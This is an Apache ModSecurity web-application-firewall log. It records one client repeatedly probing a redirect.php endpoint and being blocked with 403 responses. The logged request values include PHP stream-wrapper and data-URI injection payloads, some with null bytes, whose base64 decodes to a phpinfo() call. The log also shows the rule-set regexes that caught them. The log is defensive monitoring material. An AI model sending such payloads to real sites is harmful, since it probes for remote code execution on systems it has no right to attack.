[Tue May 12 05:06:15.439274 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data:; found within ARGS:url: data:;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZwAAAVA"]
[Tue May 12 05:06:15.439650 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZwAAAVA"]
[Tue May 12 05:06:15.439865 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=10,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68ZwAAAVA"]
[Tue May 12 05:06:15.535110 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68aAAAAVA"]
[Tue May 12 05:06:15.535164 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68aAAAAVA"]
[Tue May 12 05:06:15.535538 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: ;base64 found within ARGS:url: data:;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68aAAAAVA"]
[Tue May 12 05:06:15.535613 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data:; found within ARGS:url: data:;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68aAAAAVA"]
[Tue May 12 05:06:15.536018 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68aAAAAVA"]
[Tue May 12 05:06:15.536243 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=10,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68aAAAAVA"]
[Tue May 12 05:06:15.631693 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: ;base64 found within ARGS:url: data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68aQAAAVA"]
[Tue May 12 05:06:15.631781 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data://text/plain;base64 found within ARGS:url: data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68aQAAAVA"]
[Tue May 12 05:06:15.632179 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68aQAAAVA"]
[Tue May 12 05:06:15.632397 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=10,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68aQAAAVA"]
[Tue May 12 05:06:15.727697 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68agAAAVA"]
[Tue May 12 05:06:15.727753 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68agAAAVA"]
[Tue May 12 05:06:15.728152 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: ;base64 found within ARGS:url: data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68agAAAVA"]
[Tue May 12 05:06:15.728233 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "80"] [id "941170"] [rev "3"] [msg "NoScript XSS InjectionChecker: Attribute Injection"] [data "Matched Data: data://text/plain;base64 found within ARGS:url: data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68agAAAVA"]
[Tue May 12 05:06:15.728633 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68agAAAVA"]
[Tue May 12 05:06:15.728860 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=10,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: Attribute Injection"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68agAAAVA"]
[Tue May 12 05:06:15.824478 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/convert.base64-decode/convert.base64-decode/resource=data://plain/text,UEQ5d2FIQWdjR2h3YVc1bWJ5Z3BPeUEvUGc9PQ=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68awAAAVA"]
[Tue May 12 05:06:15.824636 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: .base64 found within ARGS:url: php://filter/convert.base64-decode/convert.base64-decode/resource=data://plain/text,UEQ5d2FIQWdjR2h3YVc1bWJ5Z3BPeUEvUGc9PQ=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68awAAAVA"]
[Tue May 12 05:06:15.825161 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68awAAAVA"]
[Tue May 12 05:06:15.825391 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): XSS Filter - Category 3: Attribute Vector"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68awAAAVA"]
[Tue May 12 05:06:15.920736 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68bQAAAVA"]
[Tue May 12 05:06:15.920783 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68bQAAAVA"]
[Tue May 12 05:06:15.921053 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/convert.base64-decode/convert.base64-decode/resource=data://plain/text,UEQ5d2FIQWdjR2h3YVc1bWJ5Z3BPeUEvUGc9PQ==\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68bQAAAVA"]
[Tue May 12 05:06:15.921183 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: .base64 found within ARGS:url: php://filter/convert.base64-decode/convert.base64-decode/resource=data://plain/text,UEQ5d2FIQWdjR2h3YVc1bWJ5Z3BPeUEvUGc9PQ=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68bQAAAVA"]
[Tue May 12 05:06:15.921684 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68bQAAAVA"]
[Tue May 12 05:06:15.921886 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): XSS Filter - Category 3: Attribute Vector"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJzue9Sp-pIv_Bb68bQAAAVA"]
[Tue May 12 05:06:16.017711 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZKDue9Sp-pIv_Bb68bgAAAVA"]
[Tue May 12 05:06:16.017862 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: .base64 found within ARGS:url: php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgcGhwaW5mbygpOyA/Pg=="] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] 